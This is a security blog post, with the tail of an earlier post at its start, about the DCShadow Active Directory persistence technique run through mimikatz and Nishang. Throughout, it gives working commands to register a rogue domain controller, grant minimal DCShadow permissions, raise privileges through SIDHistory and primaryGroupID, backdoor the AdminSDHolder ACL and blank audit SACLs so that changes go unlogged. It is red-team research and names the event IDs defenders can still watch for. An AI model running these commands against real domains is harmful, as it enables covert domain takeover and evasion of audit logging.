<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:"CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com" /attribute:ntSecurityDescriptor /value:"O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-519)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)S:PAI(AU;CIFA;DT;;;WD)"
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZv2oPsuhziQHyWjqCJFsZVabsAITqNApVPKx7XtgJofQ3-429cg_F5rXrYEkJZQJJPYoqkYBU8Vk-AZ1lfnYwE_mAKC9kMpH6l1mGKp7fXd0ERNRrrhBfcjHlM9vXOsIDtKp1Yav5Y1w/s1600/mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1600" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZv2oPsuhziQHyWjqCJFsZVabsAITqNApVPKx7XtgJofQ3-429cg_F5rXrYEkJZQJJPYoqkYBU8Vk-AZ1lfnYwE_mAKC9kMpH6l1mGKp7fXd0ERNRrrhBfcjHlM9vXOsIDtKp1Yav5Y1w/s400/mimikatz.png" width="400" /></a></div>
Bingo! No logs for turning off logging. Of course, I cannot show you no logs :P But we can see the new SACL:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYxsbFWbdlIH_Zko8qCfAfMKjCBv80EJJMf4L8bYdXIOLN1IzGhhXqYc4ja9QUgPxBjC7ENeJDt5psNwgQ-KwERkupTUtmyFmBp4wrmGvIi1ZOVXOX-9nVwPuHkbN2BpRrabhoqJ_Tz8k/s1600/AdminSDHolder-ModifiedSACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="773" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYxsbFWbdlIH_Zko8qCfAfMKjCBv80EJJMf4L8bYdXIOLN1IzGhhXqYc4ja9QUgPxBjC7ENeJDt5psNwgQ-KwERkupTUtmyFmBp4wrmGvIi1ZOVXOX-9nVwPuHkbN2BpRrabhoqJ_Tz8k/s400/AdminSDHolder-ModifiedSACL.png" width="400" /></a></div>
Please note that we will still have logs related to DCShadow (4742 for the computer registered as a DC and 4662 for the domain object) but nothing else. </div>
<div style="text-align: justify;">
<br />
Note that the auditing entry in the above is <b>S:PAI(AU;CIFA;DT;;;WD)</b> <br />
<br />
What does that mean? An SDDL ACE has the form (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid), and both GUID fields are empty here:<br />
<ul><li>S: - the SACL section</li>
<li>PAI - P marks the SACL as protected (inheritance from higher-up objects is blocked); AI is the auto-inherited flag</li>
<li>AU - System Audit ACE</li>
<li>CI - Container Inherit - child objects inherit this entry</li>
<li>FA - Audit Failure - only failed accesses are audited</li>
<li>DT - Delete Tree - no specific reason for using this other than the chances of it being logged are low</li>
<li>WD - Everyone</li>
</ul>If you are not familiar with SDDL, go through these Technet posts to begin: <a href="https://blogs.technet.microsoft.com/askds/2008/04/18/the-security-descriptor-definition-language-of-love-part-1/">The Security Descriptor Definition Language of Love (Part 1)</a> and <a href="https://blogs.technet.microsoft.com/askds/2008/05/07/the-security-descriptor-definition-language-of-love-part-2/">Part 2</a>. <br />
<br />
So why the above entry? No special reason. I thought it would be better to leave an entry than to remove all of them. If you want an ineffective SACL, use just <b>S:PAI</b>. This is how it looks in the GUI:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj56x_nxy-hxdMmA3KTmv4m9C-mhhfv9Z0X-rOBfA8ie0PJHOA2us2M-HuVg05e5GpjCE6i1F7N8zpqannb897YTZuO0q0_f2NuX9yBQ-DCbC9A4yMEe2RavxkdrLyh10uIoIb8k_kWBws/s1600/AdminSDHolder-BlankSACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="521" data-original-width="778" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj56x_nxy-hxdMmA3KTmv4m9C-mhhfv9Z0X-rOBfA8ie0PJHOA2us2M-HuVg05e5GpjCE6i1F7N8zpqannb897YTZuO0q0_f2NuX9yBQ-DCbC9A4yMEe2RavxkdrLyh10uIoIb8k_kWBws/s400/AdminSDHolder-BlankSACL.png" width="400" /></a></div>
You can use the below code to read the existing ACLs of an object. The easiest way to get the desired ACE is to set it up in the GUI and then read the entries using the below code:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Import-Module ActiveDirectory
PS C:\> (Get-Acl 'AD:\CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com' -Audit).SDDL
</textarea></pre>
<br />
<b>Further Research</b><br />
<br />
This is sweet, but there is a lot of scope for further research here. For example, there is still a single 4662 logged when mimikatz does "Attributes Checking" before we push the attributes. I read the source code of mimikatz and tried to avoid that read, but with no success. <br />
<br />
Also, I could not find a way to turn off the default SACL for the domain object. In theory, this should be easily doable with commands similar to those used above!<br />
<br />
Also, there are detections based on the absence of logs as well. Unless we go for minimal modification of auditing, we will still be detected.</div>
<div style="text-align: justify;">
<br />
Hope you liked the post :)<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)
Published 2018-04-06T19:22:00+05:30, updated 2018-05-03T22:15:27+05:30
DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<a href="https://www.dcshadow.com/">DCShadow</a> is an awesome persistence technique introduced by <a href="https://twitter.com/mysmartlogon">Vincent</a> and <a href="https://twitter.com/gentilkiwi">Benjamin</a> at <a href="http://www.bluehatil.com/files/Active%20Directory%20What%20Can%20Make%20Your%20Million%20Dollar%20SIEM%20Go%20Blind.pdf">BlueHat IL</a>, and it can be executed with the help of mimikatz. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In very simplified terms, DCShadow alters the Active Directory schema (the Configuration partition and the SPN of the attacker machine) to mimic a domain controller. This "new" domain controller can then be used to push attributes (like SID History, Password History, SPNs etc.) and other data onto domain objects such as users and computers. Please visit <a href="http://dcshadow.com/">dcshadow.com</a> and the presentation linked above for more details. There are a couple more interesting posts at the <a href="https://blog.alsid.eu/dcshadow-explained-4510f52fc19d">ALSID blog</a> and the <a href="https://www.nopsec.com/blog/dcshadow-how-become-domain-controller/">NOPSEC blog</a> which are very useful in understanding DCShadow.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In this blog post, I make notes of some of the use cases of DCShadow and a couple of experiments I did while using it. Please keep in mind that I am still playing with this technique :)</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Executing DCShadow</h3>
<div style="text-align: justify;">
Grab the latest build of mimikatz from its <a href="https://github.com/gentilkiwi/mimikatz">GitHub repo</a> or Invoke-Mimikatz from <a href="https://github.com/samratashok/nishang/">Nishang</a>. The attack must be executed from a domain joined machine and needs SYSTEM privileges on the machine and, by default, domain administrator (DA) privileges on the domain.</div>
<br />
<div style="text-align: justify;">
Please keep in mind that the SYSTEM requirement is for process context and not thread. I learnt this the hard way but thankfully, a very patient Vincent and <a href="https://github.com/gentilkiwi/mimikatz/blob/2e4edccee83d63925b9a8861610b1a51276d7432/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c#L2186-L2193">the source code</a> helped me out :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, here is how to use it:</div>
<div style="text-align: justify;">
1. Start mimikatz and use !processtoken (and not token::elevate, as that elevates a thread) to escalate to SYSTEM. Make sure to use !processtoken before opening another instance of mimikatz. This is the mimikatz instance where we will specify the target object and the attributes to be modified.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEico9Rp3fcRbUhqDzoE8wcbzzrE67qZNsZ4zE_OqCZEii8_7L7YzKGE92P5iRA15MGNk9LRrsJ65FJrC65PGO5t3U647YLjZOBmttgDXpu2-8ubxTftB6yiEi8Q3YtOiBnGHh0zuwqV9fY/s1600/mimikatz_SYSTEM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="1459" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEico9Rp3fcRbUhqDzoE8wcbzzrE67qZNsZ4zE_OqCZEii8_7L7YzKGE92P5iRA15MGNk9LRrsJ65FJrC65PGO5t3U647YLjZOBmttgDXpu2-8ubxTftB6yiEi8Q3YtOiBnGHh0zuwqV9fY/s400/mimikatz_SYSTEM.png" width="400" /></a></div>
<div style="text-align: justify;">
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNv5Brdh7oyA7jVZ9JEgzhdk8enVqJpYqJzkCp0F97sFyBB9S3mkD3CHfQYmJE6-BOLS4oMQYPN_QY1H9q5cXA9hfk2yiBEb8OvfHgdEbzcBfvi8Wy6fm2mtWnyPZYIpa5Iu_Y_bRirS8/s1600/mimikatz_DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="1435" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNv5Brdh7oyA7jVZ9JEgzhdk8enVqJpYqJzkCp0F97sFyBB9S3mkD3CHfQYmJE6-BOLS4oMQYPN_QY1H9q5cXA9hfk2yiBEb8OvfHgdEbzcBfvi8Wy6fm2mtWnyPZYIpa5Iu_Y_bRirS8/s400/mimikatz_DA.png" width="400" /></a></div>
<div style="text-align: justify;">
We are now ready to use DCShadow. For example, use the below command from the mimikatz instance running as SYSTEM to change the userAccountControl value of a computer object. Mimikatz checks the validity of the object and attributes, which is awesome!<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJSRzyJQQIxc9X2-kPx6KQuvLi6MSnuPr0WmCKCl-ydCm1Fx3I3cNGJRIjrpuG4UyELHObotwuIYn2Wrrfxpd7Ln_5CVza2mL0cKIzBI_o96-_cXsS4Odr9H8l9IMZ_6ooNLK83bstXs/s1600/mimikatz_attributes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="954" data-original-width="1463" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJSRzyJQQIxc9X2-kPx6KQuvLi6MSnuPr0WmCKCl-ydCm1Fx3I3cNGJRIjrpuG4UyELHObotwuIYn2Wrrfxpd7Ln_5CVza2mL0cKIzBI_o96-_cXsS4Odr9H8l9IMZ_6ooNLK83bstXs/s400/mimikatz_attributes.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
To push the above attributes, run the below command from mimikatz running as DA.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /push
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JrreHFna8WKt0R1-ZR5AEaZOqIrekl5i0LH68YAr90aN0-2xzLp1YaTqVgC4uysmBAzqX9k29BF26Mk2O5mL6eabxbp1WNur09sQeYMRAZLd_zeQBeE-mkVK-YnDmlEO7dIld853JQ4/s1600/mimikatz_push.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="789" data-original-width="1463" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JrreHFna8WKt0R1-ZR5AEaZOqIrekl5i0LH68YAr90aN0-2xzLp1YaTqVgC4uysmBAzqX9k29BF26Mk2O5mL6eabxbp1WNur09sQeYMRAZLd_zeQBeE-mkVK-YnDmlEO7dIld853JQ4/s400/mimikatz_push.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
On the other mimikatz session, we can see that the values are updated and the RPC server is stopped. </div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCyYMLK0JdgSWCApmW_0yAW7-dVxyzM1FsFjdWqjRSJF6fxfHB38ZY_i0HZ0GfRd4CKXqKO9kwjNDO_ERNu3xV4CMrKuQkDvkeNLpHmj29RcNDaOgSvGO7SfATOJOzVgTW_7SevjxJ2bU/s1600/mimikatz_attributes_pushed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1030" data-original-width="1463" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCyYMLK0JdgSWCApmW_0yAW7-dVxyzM1FsFjdWqjRSJF6fxfHB38ZY_i0HZ0GfRd4CKXqKO9kwjNDO_ERNu3xV4CMrKuQkDvkeNLpHmj29RcNDaOgSvGO7SfATOJOzVgTW_7SevjxJ2bU/s400/mimikatz_attributes_pushed.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
Let's check the userAccountControl attribute of the computer object we modified.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> ([adsisearcher]"(&(objectCategory=Computer)(name=ops-user19))").Findall().Properties.useraccountcontrol
</textarea></pre>
</div>
<div style="text-align: justify;">
Works like a charm with Invoke-Mimikatz as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjte2i7eyebbAa1q-cLMoAdsrtBd4gC8nKbVFJm2e0SbXVKrlUIOxttxiNWlzTtq2zeLWpIqBRHeXskZrqXE-BTYV04nUBPvMHcBQAoEatYrRQ9rDGGLuf7lxUpQT7rKXHcxT45QyMc4Fc/s1600/mimikatz_attributes_result.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="206" data-original-width="1600" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjte2i7eyebbAa1q-cLMoAdsrtBd4gC8nKbVFJm2e0SbXVKrlUIOxttxiNWlzTtq2zeLWpIqBRHeXskZrqXE-BTYV04nUBPvMHcBQAoEatYrRQ9rDGGLuf7lxUpQT7rKXHcxT45QyMc4Fc/s400/mimikatz_attributes_result.png" width="400" /></a></div>
Please keep in mind that even on a local machine with interactive access, Invoke-Mimikatz does not show the message of "RPC server started" until the push command is executed, probably because of output redirection issues. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRABn3d7DOeThcZag6aOBR4_zWjdaJEsU4pTvfLw5oJrm8O0GbDG7CMJm38_jQaY2dQ2b0MDCyJttzpyzGzZOmiRxeC6DHvYw7X_X-Ljt_4ngkmiCsFEQfEPl_e2eWrezBrOtk7pg7bFE/s1600/Invoke-Mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="828" data-original-width="1600" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRABn3d7DOeThcZag6aOBR4_zWjdaJEsU4pTvfLw5oJrm8O0GbDG7CMJm38_jQaY2dQ2b0MDCyJttzpyzGzZOmiRxeC6DHvYw7X_X-Ljt_4ngkmiCsFEQfEPl_e2eWrezBrOtk7pg7bFE/s400/Invoke-Mimikatz.png" width="400" /></a></div>
<br />
<h3>
DCShadow for Red Teams</h3>
<br />
<b>Minimal permissions</b><br />
DCShadow provides amazing persistence opportunities. Many <a href="https://adsecurity.org/?p=1929">well known ones</a>, as well as some new stuff, can be executed with it without leaving logs on the DC. While learning about it, I started wondering whether there is a way to use DCShadow without DA privileges. Like most domain persistence methods, we do not need DA privileges all the time for DCShadow, only for setting it up. For using it later on, only a subset of the permissions is required. <br />
<br />
After spending much time reading the Microsoft documentation on MS-DRSR and MS-RPCE to understand the errors shown by mimikatz when not using DA, and experimenting with permissions, I was able to isolate the permissions required for running DCShadow <b>without</b> having DA privileges!<br />
<br />
What does that mean? It means you need DA privileges just once, to set up the required minimal permissions for a user of your choice. That user can successfully run DCShadow against a specific object later on. What are the rights required?<br />
<br />
The following <a href="https://technet.microsoft.com/en-us/library/ff405676.aspx">extended rights</a> on the domain object:<br />
- DS-Install-Replica (Add/Remove Replica in Domain)<br />
- DS-Replication-Manage-Topology (Manage Replication Topology)<br />
- DS-Replication-Synchronize (Replication Synchronization)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuj4UKBm52dc54GHEaL93oyTdcSaWCmtariim3HQPBhI7-1W_MsYrb8HQ5o6iZWc9nzrz2hWfixjWmLAchZ0SmAk1ckX6yj82gW54-wkmyAXc4x6qWizI5En-MI4lcZ5gyE5uYg9NFVk0/s1600/Extended_Rights_modified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="527" data-original-width="781" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuj4UKBm52dc54GHEaL93oyTdcSaWCmtariim3HQPBhI7-1W_MsYrb8HQ5o6iZWc9nzrz2hWfixjWmLAchZ0SmAk1ckX6yj82gW54-wkmyAXc4x6qWizI5En-MI4lcZ5gyE5uYg9NFVk0/s400/Extended_Rights_modified.png" width="400" /></a></div>
We also need the WriteProperty right on the computer object of the machine which is used for the attack (it gets registered as a DC), to modify its SPNs, and on the target object, to modify its attributes.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoJWuNwtuA9Tr8kavmb5dbRo8WBv22TqwnYXvZ0p4fqEWxbP-2GTaT-nMGW71ovqCoozt98gsVXBQKMISZmCFWSIt6C62xy3mmeBgXOqdUWbM8wjiu1bH3ifESHQO9JGqqJV33SOWz7AI/s1600/Target-Permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="535" data-original-width="477" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoJWuNwtuA9Tr8kavmb5dbRo8WBv22TqwnYXvZ0p4fqEWxbP-2GTaT-nMGW71ovqCoozt98gsVXBQKMISZmCFWSIt6C62xy3mmeBgXOqdUWbM8wjiu1bH3ifESHQO9JGqqJV33SOWz7AI/s400/Target-Permissions.png" width="356" /></a></div>
Lastly, CreateChild and DeleteChild permissions are required on the Sites object (and child objects) in the Configuration container to register and un-register a DC. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfwxzN3wr2GlKOKE22aXjDaZMEFBvYGCzF9kGvVdNl14shTK6YGDjSlggBClweJSXLj0AUC9EarShtudYh8GygoDUBfj0sg0eV9V7o7mSW8AEa1yB0AxVzB2Ie2qeNVH6fsQwsxjp_58/s1600/Sites-Permission.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="462" data-original-width="414" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfwxzN3wr2GlKOKE22aXjDaZMEFBvYGCzF9kGvVdNl14shTK6YGDjSlggBClweJSXLj0AUC9EarShtudYh8GygoDUBfj0sg0eV9V7o7mSW8AEa1yB0AxVzB2Ie2qeNVH6fsQwsxjp_58/s400/Sites-Permission.png" width="357" /></a></div>
To automate modification of the objects, I give you <a href="https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1">Set-DCShadowPermissions.ps1</a> in Nishang, a PowerShell script which sets the minimal permissions for executing the DCShadow attack! Use the below command with DA privileges to set permissions for the user "labuser" to run DCShadow against the computer object ops-user19 from the computer ops-user12. </div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> . C:\nishang\ActiveDirectory\Set-DCShadowPermissions.ps1
PS C:\> Set-DCShadowPermissions -FakeDC ops-user12 -Object "ops-user19" -Username labuser -Verbose
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSuKsJRD4WCwaN87BGW3MLBoHjTHlZlPGnnO-IOdKwSC2y18neE5VowvVGxu__OrQYRm4vXxXIM3-9fEg7ohI83dWBHq3_96VJPCH9ccAJ9zBMRsF3kwe65iowUyMCDtsqDRvVhDt80XU/s1600/Set-DCShadowPermissions-Computer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="259" data-original-width="1600" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSuKsJRD4WCwaN87BGW3MLBoHjTHlZlPGnnO-IOdKwSC2y18neE5VowvVGxu__OrQYRm4vXxXIM3-9fEg7ohI83dWBHq3_96VJPCH9ccAJ9zBMRsF3kwe65iowUyMCDtsqDRvVhDt80XU/s400/Set-DCShadowPermissions-Computer.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
Now, the mimikatz command can be executed without DA privileges. Please note that the command output is the same as when using DA (see the screenshots at the beginning of the post).<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikFsRXD4_1ZkcF2TB1tMNARYzy2erFjk6hOHhyphenhyphenukiXXyqfBH8OrW6iu87UNCL-pmBrKqsYZOcSNzGBiFVHSR8y-30KTWiVa4AY_l0CcAdBa1lYuGUAx3vC5R1SWCNhGUJAxPc6TQAU_pU/s1600/dcshdaow_start.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="757" data-original-width="1600" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikFsRXD4_1ZkcF2TB1tMNARYzy2erFjk6hOHhyphenhyphenukiXXyqfBH8OrW6iu87UNCL-pmBrKqsYZOcSNzGBiFVHSR8y-30KTWiVa4AY_l0CcAdBa1lYuGUAx3vC5R1SWCNhGUJAxPc6TQAU_pU/s400/dcshdaow_start.png" width="400" /></a></div>
Neat, isn't it? Append the -Remove parameter at the end of the above command for cleanup.<br />
<br />
Note that logs (4662 for changes made to the ACL of the domain object, 4742 for changes made to the ACL of the attacker's computer object and 4738 if the target is a user object) are generated when you modify ACLs using Set-DCShadowPermissions, but the same is true for other methods of persisting with high privileges. <br />
<br />
Once we have the permissions (or DA), we can use DCShadow for tons of interesting things. Let's have a look at some of them. Please note that I am going to use all of them without DA by modifying permissions using Set-DCShadowPermissions:<br />
<br />
<b>SIDHistory</b><br />
Very useful, and also mentioned in the DCShadow presentation. Set the SIDHistory of an account to that of a high-privilege group like DA or EA and we are all set for the highest privileges, without having to modify any group membership or ACL.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-DCShadowPermissions -FakeDC ops-user12 -Object helpdeskuser -Username labuser -Verbose
</textarea></pre>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:helpdeskuser /attribute:SIDHistory /value:S-1-5-21-3270384115-3177237293-604223748-519
</textarea></pre>
<br />
<b>PrimaryGroupID</b><br />
This too is from the presentation. Change the primaryGroupID of an object to that of a highly privileged group for higher privileges.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:helpdeskuser /attribute:primaryGroupID /value:519
</textarea></pre>
There is a catch though: if this is used to change the primaryGroupID of a user to a privileged group, that user may show up in the listing of that group, which is not really stealthy. Note that this listing in the group depends on the tool used for enumeration. For example, in the below screenshot, the user "helpdeskuser" shows up as a member of the "Enterprise Admins" group when using net.exe (or Get-ADGroupMember from the ActiveDirectory module) but not when using PowerView ;)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrr5wwNjrxM9ll7Xc85Ld43TYzrhDMte7ueSUFaxgGqw-LuNMPuGmpQF68vaZyCeTmm7mi1IYZqzIEWXMzDE7tvNmus0jtoD1gQNdzqCMoli19I0-2FD23EExEQI_Ecijbqz1DlBaDZj0/s1600/PrimaryGroupID.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="853" data-original-width="1600" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrr5wwNjrxM9ll7Xc85Ld43TYzrhDMte7ueSUFaxgGqw-LuNMPuGmpQF68vaZyCeTmm7mi1IYZqzIEWXMzDE7tvNmus0jtoD1gQNdzqCMoli19I0-2FD23EExEQI_Ecijbqz1DlBaDZj0/s400/PrimaryGroupID.png" width="400" /></a></div>
<b>AdminSDHolder</b><br />
Like the simpler attributes we modified above, it is possible to modify ACLs on objects using DCShadow by modifying the ntSecurityDescriptor attribute. This ability allows even more interesting stuff. For example, modifying <a href="https://technet.microsoft.com/en-us/library/2009.09.sdadminholder.aspx">AdminSDHolder</a> ACL for <a href="https://adsecurity.org/?p=1906">persistence</a>.<br />
<br />
To use this, we need to read the existing SDDL on the AdminSDHolder container and add permissions for our user's SID. This is quite similar to what I used in <a href="https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1">Set-RemoteWMI</a>.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com")).psbase.ObjectSecurity.sddl
</textarea></pre>
To add a Full Control permission we can copy the permissions of BA, DA or EA (highlighted in the above screenshot) and append our user's SID. The resulting string below needs to be added to the SDDL of AdminSDHolder.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: white; color: black;">(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-2111)
</textarea></pre>
Use the below mimikatz command for DCShadow. Make sure you use the colon ":" for specifying values to parameters:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com /attribute:ntSecurityDescriptor /value:"O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-519)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-2111)"
</textarea></pre>
<br />
<b>DCShadow using DCShadow - Shadowception</b><br />
<br />
Similar to the above, we can also push DCShadow permissions using DCShadow. I call it Shadowception. Why? Because it is fun :P We just need to push the permissions listed above when Set-DCShadowPermissions was introduced. The permissions required are:</div>
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: white; color: black;">On Domain object: (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;YourUserSID)(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;YourUserSID)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;YourUserSID)
On attacker computer object: (A;;WP;;;YourUserSID)
On attacker user object: (A;;WP;;;YourUserSID)
On the Sites object in Configuration container: (A;CI;CCDC;;;YourUserSID)
</textarea></pre>
